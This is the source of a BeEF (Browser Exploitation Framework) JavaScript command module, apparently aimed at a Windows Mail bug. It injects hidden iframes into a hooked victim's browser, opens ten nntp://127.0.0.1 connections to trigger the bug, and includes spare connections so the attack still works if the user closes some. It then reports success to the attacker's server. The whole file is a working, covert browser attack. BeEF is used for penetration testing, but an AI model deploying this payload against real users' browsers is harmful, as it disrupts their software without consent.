// // Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // container iframe var winmail_container = document.createElement('iframe'); winmail_container.setAttribute('id', 'winmail'); winmail_container.setAttribute('style', 'display:none'); document.body.appendChild(winmail_container); // initiate 10 nntp connections // 8 to trigger bug + 2 in case the user manages to close some var protocol_iframe; for(var i=1;i<=10;i++) { protocol_iframe = document.createElement('iframe'); protocol_iframe.setAttribute('src', 'nntp://127.0.0.1:119//'); protocol_iframe.setAttribute('id', 'winmail'+i); protocol_iframe.setAttribute('style', 'display:none'); winmail_container.contentWindow.document.body.appendChild(protocol_iframe); } beef.net.send("<%= @command_url %>", <%= @command_id %>, "complete"); document.body.removeChild(document.getElementById('winmail')); });